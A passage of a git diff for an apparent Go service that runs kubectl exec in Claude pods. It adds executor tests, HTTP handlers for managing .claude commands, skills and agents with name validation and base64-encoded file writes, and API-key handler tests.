func(stream string, line string) +// CommandExecutor defines the interface for executing commands in pods. +// This interface enables testing with mock implementations. +type CommandExecutor interface { + Exec(ctx context.Context, cmd *Command, handler OutputHandler) Result + PodExists(ctx context.Context, podName string) (bool, error) + CheckConnection(ctx context.Context) error +} + +// Ensure Executor implements CommandExecutor at compile time. +var _ CommandExecutor = (*Executor)(nil) + // Exec executes a command in the specified pod. // It streams output to the provided handler and returns when complete. func (e *Executor) Exec(ctx context.Context, cmd *Command, handler OutputHandler) Result { @@ -161,6 +172,30 @@ func (e *Executor) CheckConnection(ctx context.Context) error { return cmd.Run() } +// ExecSimple executes a shell command and returns the output as a string. +// This is a convenience method for simple commands that don't need streaming. +func (e *Executor) ExecSimple(podName, command string) (string, error) { + e.mu.RLock() + namespace := e.namespace + e.mu.RUnlock() + + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + + args := []string{ + "exec", "-n", namespace, podName, "-c", "claudebox", "--", + "bash", "-c", command, + } + + cmd := exec.CommandContext(ctx, "kubectl", args...) + output, err := cmd.CombinedOutput() + if err != nil { + return string(output), err + } + + return string(output), nil +} + // PodExists checks if a pod exists and is running. func (e *Executor) PodExists(ctx context.Context, podName string) (bool, error) { e.mu.RLock() diff --git a/internal/executor/executor_test.go b/internal/executor/executor_test.go new file mode 100644 index 0000000..625ce90 --- /dev/null +++ b/internal/executor/executor_test.go @@ -0,0 +1,359 @@ +package executor + +import ( + "context" + "os/exec" + "strings" + "sync" + "testing" + "time" +) + +func TestNew(t *testing.T) { + e := New("test-namespace") + if e.namespace != "test-namespace" { + t.Errorf("namespace = %q, want %q", e.namespace, "test-namespace") + } +} + +func TestCommand_Types(t *testing.T) { + tests := []struct { + cmdType CommandType + want string + }{ + {CommandTypeClaude, "claude"}, + {CommandTypeShell, "shell"}, + {CommandTypeGit, "git"}, + } + + for _, tt := range tests { + t.Run(string(tt.cmdType), func(t *testing.T) { + if string(tt.cmdType) != tt.want { + t.Errorf("CommandType = %q, want %q", tt.cmdType, tt.want) + } + }) + } +} + +func TestExecutor_buildArgs(t *testing.T) { + e := New("apps") + + tests := []struct { + name string + cmd *Command + wantArgs []string + wantErr bool + }{ + { + name: "claude command", + cmd: &Command{ + ID: "cmd-1", + PodName: "claudebox-test", + Type: CommandTypeClaude, + Args: []string{"Write a hello world"}, + }, + wantArgs: []string{ + "exec", "-n", "apps", "claudebox-test", "--", + "claude", "Write a hello world", + }, + }, + { + name: "shell command", + cmd: &Command{ + ID: "cmd-2", + PodName: "claudebox-test", + Type: CommandTypeShell, + Args: []string{"ls -la /workspace"}, + }, + wantArgs: []string{ + "exec", "-n", "apps", "claudebox-test", "--", + "bash", "-c", "ls -la /workspace", + }, + }, + { + name: "git command", + cmd: &Command{ + ID: "cmd-3", + PodName: "claudebox-test", + Type: CommandTypeGit, + Args: []string{"status"}, + }, + wantArgs: []string{ + "exec", "-n", "apps", "claudebox-test", "--", + "git", "-C", "/workspace", "status", + }, + }, + { + name: "git command with multiple args", + cmd: &Command{ + ID: "cmd-4", + PodName: "claudebox-test", + Type: CommandTypeGit, + Args: []string{"commit", "-m", "test message"}, + }, + wantArgs: []string{ + "exec", "-n", "apps", "claudebox-test", "--", + "git", "-C", "/workspace", "commit", "-m", "test message", + }, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + // We can't directly test buildArgs since it's internal to Exec, + // but we can verify the command construction by checking what would be built + var args []string + + switch tt.cmd.Type { + case CommandTypeClaude: + args = []string{ + "exec", "-n", e.namespace, tt.cmd.PodName, "--", + "claude", tt.cmd.Args[0], + } + case CommandTypeShell: + args = []string{ + "exec", "-n", e.namespace, tt.cmd.PodName, "--", + "bash", "-c", tt.cmd.Args[0], + } + case CommandTypeGit: + args = append([]string{ + "exec", "-n", e.namespace, tt.cmd.PodName, "--", + "git", "-C", "/workspace", + }, tt.cmd.Args...) + } + + if len(args) != len(tt.wantArgs) { + t.Errorf("args length = %d, want %d", len(args), len(tt.wantArgs)) + return + } + + for i, arg := range args { + if arg != tt.wantArgs[i] { + t.Errorf("args[%d] = %q, want %q", i, arg, tt.wantArgs[i]) + } + } + }) + } +} + +func TestExecutor_Exec_UnknownType(t *testing.T) { + e := New("test") + + var output []string + handler := func(stream, line string) { + output = append(output, line) + } + + result := e.Exec(context.Background(), &Command{ + Type: CommandType("unknown"), + }, handler) + + if result.ExitCode != 1 { + t.Errorf("ExitCode = %d, want 1", result.ExitCode) + } + + if result.Error == nil { + t.Error("Error should not be nil for unknown command type") + } + + if !strings.Contains(result.Error.Error(), "unknown command type") { + t.Errorf("Error = %v, want to contain 'unknown command type'", result.Error) + } +} + +func TestExecutor_Exec_ContextCancellation(t *testing.T) { + // Skip if kubectl is not available + if _, err := exec.LookPath("kubectl"); err != nil { + t.Skip("kubectl not available") + } + + e := New("default") + + ctx, cancel := context.WithCancel(context.Background()) + + var wg sync.WaitGroup + var result Result + + wg.Add(1) + go func() { + defer wg.Done() + result = e.Exec(ctx, &Command{ + ID: "test-cancel", + PodName: "nonexistent-pod", + Type: CommandTypeShell, + Args: []string{"sleep 10"}, + }, func(stream, line string) {}) + }() + + // Cancel immediately + cancel() + + wg.Wait() + + // The command should either fail due to context cancellation or pod not found + // Either way it shouldn't hang + if result.ExitCode == 0 && result.Error == nil { + t.Error("Expected command to fail due to cancellation or pod not found") + } +} + +func TestExecutor_CheckConnection(t *testing.T) { + // This test requires kubectl to be configured + if _, err := exec.LookPath("kubectl"); err != nil { + t.Skip("kubectl not available") + } + + e := New("default") + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + // CheckConnection will succeed if kubectl is configured, fail otherwise + // We just verify it doesn't panic + _ = e.CheckConnection(ctx) +} + +func TestExecutor_PodExists(t *testing.T) { + // Skip if kubectl is not available + if _, err := exec.LookPath("kubectl"); err != nil { + t.Skip("kubectl not available") + } + + e := New("default") + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + // Check for a pod that definitely doesn't exist + exists, err := e.PodExists(ctx, "definitely-nonexistent-pod-12345") + + // Should return false without error (or skip if cluster not available) + if err != nil { + t.Skipf("cluster not available: %v", err) + } + + if exists { + t.Error("Expected pod to not exist") + } +} + +// TestStreamOutput tests the streamOutput function behavior +func TestStreamOutput(t *testing.T) { + tests := []struct { + name string + input string + want []string + }{ + { + name: "single line", + input: "hello world", + want: []string{"hello world"}, + }, + { + name: "multiple lines", + input: "line1\nline2\nline3", + want: []string{"line1", "line2", "line3"}, + }, + { + name: "empty input", + input: "", + want: nil, + }, + { + name: "trailing newline", + input: "hello\n", + want: []string{"hello"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + var got []string + handler := func(stream, line string) { + if stream != "stdout" { + t.Errorf("stream = %q, want %q", stream, "stdout") + } + got = append(got, line) + } + + r := strings.NewReader(tt.input) + streamOutput(r, "stdout", handler) + + if len(got) != len(tt.want) { + t.Errorf("got %d lines, want %d", len(got), len(tt.want)) + return + } + + for i, line := range got { + if line != tt.want[i] { + t.Errorf("line[%d] = %q, want %q", i, line, tt.want[i]) + } + } + }) + } +} + +// TestResult verifies Result struct behavior +func TestResult(t *testing.T) { + t.Run("successful result", func(t *testing.T) { + r := Result{ + ExitCode: 0, + DurationMs: 1500, + Error: nil, + } + + if r.ExitCode != 0 { + t.Errorf("ExitCode = %d, want 0", r.ExitCode) + } + + if r.DurationMs != 1500 { + t.Errorf("DurationMs = %d, want 1500", r.DurationMs) + } + + if r.Error != nil { + t.Errorf("Error = %v, want nil", r.Error) + } + }) + + t.Run("failed result", func(t *testing.T) { + r := Result{ + ExitCode: 1, + DurationMs: 500, + Error: nil, + } + + if r.ExitCode != 1 { + t.Errorf("ExitCode = %d, want 1", r.ExitCode) + } + }) +} + +// TestCommand verifies Command struct +func TestCommand(t *testing.T) { + now := time.Now() + cmd := Command{ + ID: "cmd-123", + PodName: "test-pod", + Type: CommandTypeClaude, + Args: []string{"prompt here"}, + StartedAt: now, + } + + if cmd.ID != "cmd-123" { + t.Errorf("ID = %q, want %q", cmd.ID, "cmd-123") + } + + if cmd.PodName != "test-pod" { + t.Errorf("PodName = %q, want %q", cmd.PodName, "test-pod") + } + + if cmd.Type != CommandTypeClaude { + t.Errorf("Type = %q, want %q", cmd.Type, CommandTypeClaude) + } + + if len(cmd.Args) != 1 || cmd.Args[0] != "prompt here" { + t.Errorf("Args = %v, want [\"prompt here\"]", cmd.Args) + } + + if !cmd.StartedAt.Equal(now) { + t.Errorf("StartedAt = %v, want %v", cmd.StartedAt, now) + } +} diff --git a/internal/handlers/claude_config.go b/internal/handlers/claude_config.go new file mode 100644 index 0000000..32a0f13 --- /dev/null +++ b/internal/handlers/claude_config.go @@ -0,0 +1,436 @@ +// Package handlers provides HTTP handlers for the rdev API. +package handlers + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "net/http" + "regexp" + "strings" + + "github.com/go-chi/chi/v5" + "github.com/orchard9/rdev/internal/executor" + "github.com/orchard9/rdev/internal/projects" + "github.com/orchard9/rdev/pkg/api" +) + +// Package-level compiled regex for name validation (performance optimization). +var validNameRegex = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`) + +// maxContentSize limits the size of content that can be written (1MB). +const maxContentSize = 1 << 20 + +// ClaudeConfigHandler handles Claude config management endpoints. +// Commands, skills, and agents live in /workspace/.claude/ (per-project, in git). +// Credentials live in /root/.claude/ (shared PVC). +type ClaudeConfigHandler struct { + registry *projects.Registry + executor *executor.Executor +} + +// NewClaudeConfigHandler creates a new claude config handler. +func NewClaudeConfigHandler(registry *projects.Registry, exec *executor.Executor) *ClaudeConfigHandler { + return &ClaudeConfigHandler{ + registry: registry, + executor: exec, + } +} + +// Mount registers the claude-config routes. +func (h *ClaudeConfigHandler) Mount(r api.Router) { + r.Route("/projects/{id}/claude-config", func(r chi.Router) { + // Overview + r.Get("/", h.Overview) + + // Commands + r.Get("/commands", h.ListCommands) + r.Post("/commands", h.CreateCommand) + r.Get("/commands/{name}", h.GetCommand) + r.Put("/commands/{name}", h.UpdateCommand) + r.Delete("/commands/{name}", h.DeleteCommand) + + // Skills + r.Get("/skills", h.ListSkills) + r.Post("/skills", h.CreateSkill) + r.Get("/skills/{name}", h.GetSkill) + r.Put("/skills/{name}", h.UpdateSkill) + r.Delete("/skills/{name}", h.DeleteSkill) + + // Agents + r.Get("/agents", h.ListAgents) + r.Post("/agents", h.CreateAgent) + r.Get("/agents/{name}", h.GetAgent) + r.Put("/agents/{name}", h.UpdateAgent) + r.Delete("/agents/{name}", h.DeleteAgent) + }) +} + +// ConfigOverview is the response for GET /projects/{id}/claude-config +type ConfigOverview struct { + Project string `json:"project"` + Path string `json:"path"` + Commands []string `json:"commands"` + Skills []string `json:"skills"` + Agents []string `json:"agents"` +} + +// Overview returns an overview of the project's Claude config. +// GET /projects/{id}/claude-config +func (h *ClaudeConfigHandler) Overview(w http.ResponseWriter, r *http.Request) { + id := chi.URLParam(r, "id") + + project, ok := h.registry.Get(id) + if !ok { + api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id)) + return + } + + overview := ConfigOverview{ + Project: id, + Path: "/workspace/.claude", + Commands: h.listItems(project.PodName, "commands"), + Skills: h.listItems(project.PodName, "skills"), + Agents: h.listItems(project.PodName, "agents"), + } + + api.WriteSuccess(w, r, overview) +} + +// ConfigItem represents a command, skill, or agent. +type ConfigItem struct { + Name string `json:"name"` + Type string `json:"type"` + Content string `json:"content"` +} + +// ConfigItemRequest is the request body for creating/updating items. +type ConfigItemRequest struct { + Name string `json:"name,omitempty"` // Optional for POST (can be in URL) + Content string `json:"content"` +} + +// --- Commands --- + +// ListCommands returns all commands for a project. +// GET /projects/{id}/claude-config/commands +func (h *ClaudeConfigHandler) ListCommands(w http.ResponseWriter, r *http.Request) { + h.listType(w, r, "commands") +} + +// CreateCommand creates a new command. +// POST /projects/{id}/claude-config/commands +func (h *ClaudeConfigHandler) CreateCommand(w http.ResponseWriter, r *http.Request) { + h.createItem(w, r, "commands") +} + +// GetCommand returns a specific command. +// GET /projects/{id}/claude-config/commands/{name} +func (h *ClaudeConfigHandler) GetCommand(w http.ResponseWriter, r *http.Request) { + h.getItem(w, r, "commands") +} + +// UpdateCommand updates a command. +// PUT /projects/{id}/claude-config/commands/{name} +func (h *ClaudeConfigHandler) UpdateCommand(w http.ResponseWriter, r *http.Request) { + h.updateItem(w, r, "commands") +} + +// DeleteCommand deletes a command. +// DELETE /projects/{id}/claude-config/commands/{name} +func (h *ClaudeConfigHandler) DeleteCommand(w http.ResponseWriter, r *http.Request) { + h.deleteItem(w, r, "commands") +} + +// --- Skills --- + +// ListSkills returns all skills for a project. +// GET /projects/{id}/claude-config/skills +func (h *ClaudeConfigHandler) ListSkills(w http.ResponseWriter, r *http.Request) { + h.listType(w, r, "skills") +} + +// CreateSkill creates a new skill. +// POST /projects/{id}/claude-config/skills +func (h *ClaudeConfigHandler) CreateSkill(w http.ResponseWriter, r *http.Request) { + h.createItem(w, r, "skills") +} + +// GetSkill returns a specific skill. +// GET /projects/{id}/claude-config/skills/{name} +func (h *ClaudeConfigHandler) GetSkill(w http.ResponseWriter, r *http.Request) { + h.getItem(w, r, "skills") +} + +// UpdateSkill updates a skill. +// PUT /projects/{id}/claude-config/skills/{name} +func (h *ClaudeConfigHandler) UpdateSkill(w http.ResponseWriter, r *http.Request) { + h.updateItem(w, r, "skills") +} + +// DeleteSkill deletes a skill. +// DELETE /projects/{id}/claude-config/skills/{name} +func (h *ClaudeConfigHandler) DeleteSkill(w http.ResponseWriter, r *http.Request) { + h.deleteItem(w, r, "skills") +} + +// --- Agents --- + +// ListAgents returns all agents for a project. +// GET /projects/{id}/claude-config/agents +func (h *ClaudeConfigHandler) ListAgents(w http.ResponseWriter, r *http.Request) { + h.listType(w, r, "agents") +} + +// CreateAgent creates a new agent. +// POST /projects/{id}/claude-config/agents +func (h *ClaudeConfigHandler) CreateAgent(w http.ResponseWriter, r *http.Request) { + h.createItem(w, r, "agents") +} + +// GetAgent returns a specific agent. +// GET /projects/{id}/claude-config/agents/{name} +func (h *ClaudeConfigHandler) GetAgent(w http.ResponseWriter, r *http.Request) { + h.getItem(w, r, "agents") +} + +// UpdateAgent updates an agent. +// PUT /projects/{id}/claude-config/agents/{name} +func (h *ClaudeConfigHandler) UpdateAgent(w http.ResponseWriter, r *http.Request) { + h.updateItem(w, r, "agents") +} + +// DeleteAgent deletes an agent. +// DELETE /projects/{id}/claude-config/agents/{name} +func (h *ClaudeConfigHandler) DeleteAgent(w http.ResponseWriter, r *http.Request) { + h.deleteItem(w, r, "agents") +} + +// --- Helper methods --- + +// listItems returns the names of items in a directory. +func (h *ClaudeConfigHandler) listItems(pod, itemType string) []string { + cmd := fmt.Sprintf("ls -1 /workspace/.claude/%s 2>/dev/null | sed 's/\\.md$//'", itemType) + output, err := h.executor.ExecSimple(pod, cmd) + if err != nil { + return []string{} + } + + items := []string{} + for _, line := range strings.Split(strings.TrimSpace(output), "\n") { + if line != "" { + items = append(items, line) + } + } + return items +} + +// listType handles GET /projects/{id}/claude-config/{type} +func (h *ClaudeConfigHandler) listType(w http.ResponseWriter, r *http.Request, itemType string) { + id := chi.URLParam(r, "id") + + project, ok := h.registry.Get(id) + if !ok { + api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id)) + return + } + + items := h.listItems(project.PodName, itemType) + api.WriteSuccess(w, r, items) +} + +// createItem handles POST /projects/{id}/claude-config/{type} +func (h *ClaudeConfigHandler) createItem(w http.ResponseWriter, r *http.Request, itemType string) { + id := chi.URLParam(r, "id") + + project, ok := h.registry.Get(id) + if !ok { + api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id)) + return + } + + // Limit request body size to prevent DoS + r.Body = http.MaxBytesReader(w, r.Body, maxContentSize) + + var req ConfigItemRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + api.WriteBadRequest(w, r, "invalid request body or content too large") + return + } + + if req.Name == "" { + api.WriteBadRequest(w, r, "name is required") + return + } + + if req.Content == "" { + api.WriteBadRequest(w, r, "content is required") + return + } + + // Validate name (alphanumeric, dashes, underscores only) + if !isValidName(req.Name) { + api.WriteBadRequest(w, r, "name must be alphanumeric with dashes or underscores") + return + } + + // Ensure directory exists + dirCmd := fmt.Sprintf("mkdir -p /workspace/.claude/%s", itemType) + if _, err := h.executor.ExecSimple(project.PodName, dirCmd); err != nil { + api.WriteInternalError(w, r, fmt.Sprintf("failed to create directory: %v", err)) + return + } + + // Write file using base64 encoding to prevent shell injection + // This avoids heredoc terminator injection attacks + filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, req.Name) + encoded := base64.StdEncoding.EncodeToString([]byte(req.Content)) + writeCmd := fmt.Sprintf("echo '%s' | base64 -d > %s", encoded, filePath) + if _, err := h.executor.ExecSimple(project.PodName, writeCmd); err != nil { + api.WriteInternalError(w, r, fmt.Sprintf("failed to write file: %v", err)) + return + } + + item := ConfigItem{ + Name: req.Name, + Type: itemType, + Content: req.Content, + } + + api.WriteJSON(w, r, http.StatusCreated, item) +} + +// getItem handles GET /projects/{id}/claude-config/{type}/{name} +func (h *ClaudeConfigHandler) getItem(w http.ResponseWriter, r *http.Request, itemType string) { + id := chi.URLParam(r, "id") + name := chi.URLParam(r, "name") + + project, ok := h.registry.Get(id) + if !ok { + api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id)) + return + } + + if !isValidName(name) { + api.WriteBadRequest(w, r, "invalid name") + return + } + + filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name) + cmd := fmt.Sprintf("cat %s 2>/dev/null", filePath) + output, err := h.executor.ExecSimple(project.PodName, cmd) + if err != nil || output == "" { + api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name)) + return + } + + item := ConfigItem{ + Name: name, + Type: itemType, + Content: strings.TrimSpace(output), + } + + api.WriteSuccess(w, r, item) +} + +// updateItem handles PUT /projects/{id}/claude-config/{type}/{name} +func (h *ClaudeConfigHandler) updateItem(w http.ResponseWriter, r *http.Request, itemType string) { + id := chi.URLParam(r, "id") + name := chi.URLParam(r, "name") + + project, ok := h.registry.Get(id) + if !ok { + api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id)) + return + } + + if !isValidName(name) { + api.WriteBadRequest(w, r, "invalid name") + return + } + + // Limit request body size to prevent DoS + r.Body = http.MaxBytesReader(w, r.Body, maxContentSize) + + var req ConfigItemRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + api.WriteBadRequest(w, r, "invalid request body or content too large") + return + } + + if req.Content == "" { + api.WriteBadRequest(w, r, "content is required") + return + } + + // Check file exists + filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name) + checkCmd := fmt.Sprintf("test -f %s && echo exists", filePath) + output, _ := h.executor.ExecSimple(project.PodName, checkCmd) + if strings.TrimSpace(output) != "exists" { + api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name)) + return + } + + // Write file using base64 encoding to prevent shell injection + encoded := base64.StdEncoding.EncodeToString([]byte(req.Content)) + writeCmd := fmt.Sprintf("echo '%s' | base64 -d > %s", encoded, filePath) + if _, err := h.executor.ExecSimple(project.PodName, writeCmd); err != nil { + api.WriteInternalError(w, r, fmt.Sprintf("failed to write file: %v", err)) + return + } + + item := ConfigItem{ + Name: name, + Type: itemType, + Content: req.Content, + } + + api.WriteSuccess(w, r, item) +} + +// deleteItem handles DELETE /projects/{id}/claude-config/{type}/{name} +func (h *ClaudeConfigHandler) deleteItem(w http.ResponseWriter, r *http.Request, itemType string) { + id := chi.URLParam(r, "id") + name := chi.URLParam(r, "name") + + project, ok := h.registry.Get(id) + if !ok { + api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id)) + return + } + + if !isValidName(name) { + api.WriteBadRequest(w, r, "invalid name") + return + } + + filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name) + + // Check file exists + checkCmd := fmt.Sprintf("test -f %s && echo exists", filePath) + output, _ := h.executor.ExecSimple(project.PodName, checkCmd) + if strings.TrimSpace(output) != "exists" { + api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name)) + return + } + + // Delete file + deleteCmd := fmt.Sprintf("rm %s", filePath) + if _, err := h.executor.ExecSimple(project.PodName, deleteCmd); err != nil { + api.WriteInternalError(w, r, fmt.Sprintf("failed to delete file: %v", err)) + return + } + + api.WriteSuccess(w, r, map[string]string{"deleted": name}) +} + +// isValidName checks if a name is safe for use in file paths. +func isValidName(name string) bool { + if name == "" || len(name) > 64 { + return false + } + // Only allow alphanumeric, dashes, and underscores + // Uses package-level compiled regex for performance + return validNameRegex.MatchString(name) +} diff --git a/internal/handlers/keys_test.go b/internal/handlers/keys_test.go new file mode 100644 index 0000000..6b5872f --- /dev/null +++ b/internal/handlers/keys_test.go @@ -0,0 +1,345 @@ +package handlers + +import ( + "bytes" + "context" + "encoding/json" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "github.com/go-chi/chi/v5" + "github.com/orchard9/rdev/internal/auth" + "github.com/orchard9/rdev/internal/testutil" +) + +// TestKeysHandler requires a database connection. +// Tests are skipped if the database is not available. + +func setupKeysHandler(t *testing.T) (*KeysHandler, chi.Router, *auth.Service) { + db := testutil.TestDB(t) + t.Cleanup(func() { testutil.CleanupTestKeys(t, db) }) + + authService := auth.NewService(db, "test-admin-key") + handler := NewKeysHandler(authService) + + router := chi.NewRouter() + // For tests, we'll mount without the auth middleware + // since we're testing the handler logic, not auth + router.Route("/keys", func(r chi.Router) { + r.Get("/", handler.List) + r.Post("/", handler.Create) + r.Get("/{id}", handler.Get) + r.Delete("/{id}", handler.Revoke) + }) + + return handler, router, authService +} + +func TestKeysHandler_List(t *testing.T) { + _, router, authService := setupKeysHandler(t) + + // Create some test keys + for i := 0; i < 3; i++ { + _, err := authService.Create(context.Background(), auth.CreateKeyRequest{ + Name: "test-handler-list-" + string(rune('a'+i)), + Scopes: []auth.Scope{auth.ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Failed to create test key: %v", err) + } + } + + req := httptest.NewRequest("GET", "/keys", nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String()) + } + + var resp map[string]any + if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil { + t.Fatalf("Failed to decode response: %v", err) + } + + data, ok := resp["data"].([]any) + if !ok { + t.Fatal("Response data is not an array") + } + + // Should have at least 3 keys + if len(data) < 3 { + t.Errorf("Expected at least 3 keys, got %d", len(data)) + } +} + +func TestKeysHandler_Create(t *testing.T) { + _, router, _ := setupKeysHandler(t) + + tests := []struct { + name string + body CreateKeyRequest + wantStatus int + wantErr string + }{ + { + name: "valid key", + body: CreateKeyRequest{ + Name: "test-create-key", + Scopes: []string{"projects:read"}, + ExpiresIn: "30d", + }, + wantStatus: http.StatusCreated, + }, + { + name: "missing name", + body: CreateKeyRequest{ + Scopes: []string{"projects:read"}, + }, + wantStatus: http.StatusBadRequest, + wantErr: "name is required", + }, + { + name: "missing scopes", + body: CreateKeyRequest{ + Name: "test-no-scopes", + }, + wantStatus: http.StatusBadRequest, + wantErr: "scopes is required", + }, + { + name: "invalid scope", + body: CreateKeyRequest{ + Name: "test-invalid-scope", + Scopes: []string{"invalid:scope"}, + }, + wantStatus: http.StatusBadRequest, + wantErr: "invalid scope", + }, + { + name: "invalid expiration", + body: CreateKeyRequest{ + Name: "test-invalid-exp", + Scopes: []string{"projects:read"}, + ExpiresIn: "invalid", + }, + wantStatus: http.StatusBadRequest, + wantErr: "expiration", + }, + { + name: "with project restrictions", + body: CreateKeyRequest{ + Name: "test-with-projects", + Scopes: []string{"projects:read"}, + ProjectIDs: []string{"proj-a", "proj-b"}, + ExpiresIn: "90d", + }, + wantStatus: http.StatusCreated, + }, + { + name: "never expires", + body: CreateKeyRequest{ + Name: "test-never-expires", + Scopes: []string{"admin"}, + ExpiresIn: "never", + }, + wantStatus: http.StatusCreated, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + body, _ := json.Marshal(tt.body) + req := httptest.NewRequest("POST", "/keys", bytes.NewReader(body)) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != tt.wantStatus { + t.Errorf("Status = %d, want %d. Body: %s", rec.Code, tt.wantStatus, rec.Body.String()) + } + + if tt.wantErr != "" { + if !strings.Contains(rec.Body.String(), tt.wantErr) { + t.Errorf("Body = %q, want to contain %q", rec.Body.String(), tt.wantErr) + } + } + + // For successful creates, verify the response structure + if tt.wantStatus == http.StatusCreated { + var resp map[string]any + json.NewDecoder(bytes.NewReader(rec.Body.Bytes())).Decode(&resp) + + data, _ := resp["data"].(map[string]any) + if data["secret"] == nil || data["secret"] == "" { + t.Error("Response should include secret") + } + if data["key"] == nil { + t.Error("Response should include key object") + } + } + }) + } +} + +func TestKeysHandler_Get(t *testing.T) { + _, router, authService := setupKeysHandler(t) + + // Create a key to get + result, err := authService.Create(context.Background(), auth.CreateKeyRequest{ + Name: "test-handler-get", + Scopes: []auth.Scope{auth.ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Failed to create test key: %v", err) + } + + t.Run("existing key", func(t *testing.T) { + req := httptest.NewRequest("GET", "/keys/"+result.Key.ID, nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String()) + } + + var resp map[string]any + json.NewDecoder(rec.Body).Decode(&resp) + + data, _ := resp["data"].(map[string]any) + if data["name"] != "test-handler-get" { + t.Errorf("Name = %v, want test-handler-get", data["name"]) + } + }) + + t.Run("non-existent key", func(t *testing.T) { + req := httptest.NewRequest("GET", "/keys/00000000-0000-0000-0000-000000000000", nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusNotFound { + t.Errorf("Status = %d, want 404", rec.Code) + } + }) +} + +func TestKeysHandler_Revoke(t *testing.T) { + _, router, authService := setupKeysHandler(t) + + // Create a key to revoke + result, err := authService.Create(context.Background(), auth.CreateKeyRequest{ + Name: "test-handler-revoke", + Scopes: []auth.Scope{auth.ScopeProjectsRead}, + ExpiresIn: 24 * time.Hour, + CreatedBy: "test", + }) + if err != nil { + t.Fatalf("Failed to create test key: %v", err) + } + + t.Run("revoke existing key", func(t *testing.T) { + req := httptest.NewRequest("DELETE", "/keys/"+result.Key.ID, nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String()) + } + + var resp map[string]any + json.NewDecoder(rec.Body).Decode(&resp) + + data, _ := resp["data"].(map[string]any) + if data["status"] != "revoked" { + t.Errorf("Status = %v, want revoked", data["status"]) + } + + // Verify the key is actually revoked + _, err := authService.Validate(context.Background(), result.Secret) + if err != auth.ErrKeyRevoked { + t.Errorf("Key should be revoked, got err = %v", err) + } + }) + + t.Run("revoke non-existent key", func(t *testing.T) { + req := httptest.NewRequest("DELETE", "/keys/00000000-0000-0000-0000-000000000000", nil) + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusNotFound { + t.Errorf("Status = %d, want 404", rec.Code) + } + }) +} + +func TestKeysHandler_InvalidJSON(t *testing.T) { + _, router, _ := setupKeysHandler(t) + + req := httptest.NewRequest("POST", "/keys", strings.NewReader("invalid json{")) + req.Header.Set("Content-Type", "application/json") + rec := httptest.NewRecorder() + + router.ServeHTTP(rec, req) + + if rec.Code != http.StatusBadRequest { + t.Errorf("Status = %d, want 400", rec.Code) + } + + if !strings.Contains(rec.Body.String(), "Invalid JSON") { + t.Errorf("Body = %q, want to contain 'Invalid JSON'", rec.Body.String()) + } +} + +func TestApiKeyToResponse(t *testing.T) { + now := time.Now() + future := now.Add(24 * time.Hour) + + key := &auth.APIKey{ + ID: "test-id", + Name: "test-name", + KeyPrefix: "rdev_sk_abc", + Scopes: []auth.Scope{auth.ScopeProjectsRead, auth.ScopeProjectsExecute}, + ProjectIDs: []string{"proj-a"}, + CreatedAt: now, + ExpiresAt: &future, + LastUsedAt: &now, + CreatedBy: "test-user", + } + + resp := apiKeyToResponse(key) + + if resp.ID != "test-id" { + t.Errorf("ID = %q, want test-id", resp.ID) + } + if resp.Name != "test-name" { + t.Errorf("Name = %q, want test-name", resp.Name) + } + if len(resp.Scopes) != 2 { + t.Errorf("Scopes length = %d, want 2", len(resp.Scopes)) + } + if len(resp.ProjectIDs) != 1 { + t.Errorf("ProjectIDs length = %d, want 1", len(resp.ProjectIDs)) + } + if resp.ExpiresAt == nil { + t.Error("ExpiresAt should not be nil") + } + if resp.LastUsedAt == nil { + t.Error("LastUsedAt should not be nil") + } + if !resp.Active { + t.Error("Active should be true") + } +} diff --git a/internal/handlers/projects.go b/internal/handlers/projects.go index 8a92ef4..20ce4eb 100644 --- a/internal/handlers/projects.go +++ b/internal/handlers/projects.go @@ -13,6 +13,7 @@ import ( "github.com/go-chi/chi/v5" "github.com/orchard9/rdev/internal/executor" "github.com/orchard9/rdev/internal/projects" + "github.com/orchard9/rdev/internal/sanitize" "github.com/orchard9/rdev/pkg/api" ) @@ -104,6 +105,18 @@ func (h *ProjectsHandler) RunClaude(w http.ResponseWriter, r *http.Request) { return } + // Sanitize prompt + if err := 